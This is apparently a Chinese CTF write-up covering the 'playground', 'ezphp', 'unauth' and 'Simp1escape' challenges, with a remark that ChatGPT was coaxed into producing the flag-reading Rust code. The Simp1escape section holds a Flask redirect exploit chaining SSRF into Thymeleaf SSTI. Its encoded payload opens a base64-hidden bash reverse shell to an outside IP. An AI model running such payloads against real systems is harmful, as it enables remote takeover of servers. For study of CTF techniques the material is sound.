playground

直接调教chatgpt就出了
2024-04-04T06:24:17.png

#[cfg(target_os = "linux")]
mod syscalls {
    #[link(name = "c")]
    extern "C" {
        pub fn open(filename: *const u8, flags: i32) -> i32;
        pub fn read(fd: i32, buf: *mut u8, count: usize) -> isize;
        pub fn close(fd: i32) -> i32;
    }
}

fn main() {
    let filename = b"/flag\0" as *const u8;
    let fd = unsafe { syscalls::open(filename, 0) };
    if fd == -1 {
        panic!("Failed to open file");
    }

    let mut buffer = [0u8; 1024];
    let bytes_read = unsafe {
        syscalls::read(fd, buffer.as_mut_ptr(), buffer.len())
    };
    if bytes_read == -1 {
        panic!("Failed to read from file");
    }

    // Convert buffer to string and print
    let content = unsafe {
        core::str::from_utf8_unchecked(&buffer[..bytes_read as usize])
    };
    println!("{}", content);

    unsafe { syscalls::close(fd) };
}

2024-04-04T06:21:19.png

ezphp

2024-04-04T07:00:33.png
搜索发现这篇文章,跑了两个小时脚本没读到,队友一下子就成功了
2024-04-04T07:02:03.png
然后就是一个匿名类的问题,稍微改一下代码
2024-04-04T07:14:25.png
class%40anonymous%00%2Fvar%2Fwww%2Fhtml%2Fflag.php%3A7%240就是那个匿名类的名称
更具体可以看官方文档

unauth

www.zip有admin的密码,登录是一句话木马,看wp说是ban了很多函数,但是我连echo 1都不能输出,感觉很恶心,还以为是之前NssRound#20那种拿java装php的整人题呢。

Simp1escape

参考wp
三个路由,/index、/curl、/getsites,curl提供个一个类似于curl命令的功能,但是不能curl本地ip,getsites只有本地ip可以访问,有String dispaly = engine.process(hostname, context);这一句,看wp说可以进行Thymeleaf SSTI,然后curl可以通过302跳转访问到靶机的getsites
不是很懂,这里直接复制payload复现一下

from flask import Flask, redirect, url_for, render_template, request
app = Flask(__name__)

@app.route('/', methods=['POST', 'GET'])
def login():
    exp = "%3c%61%20%74%68%3a%68%72%65%66%3d%22%24%7b%27%27%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%6a%51%75%4d%6a%49%78%4c%6a%45%35%4c%6a%49%78%4e%43%38%79%4d%7a%4d%7a%49%44%41%2b%4a%6a%45%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%27%29%7d%22%20%74%68%3a%74%69%74%6c%65%3d%27%70%65%70%69%74%6f%27%3e"
    return redirect(f"http://127.0.0.1:8080/getsites?hostname={exp}");

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=5000)

2024-04-06T07:33:55.png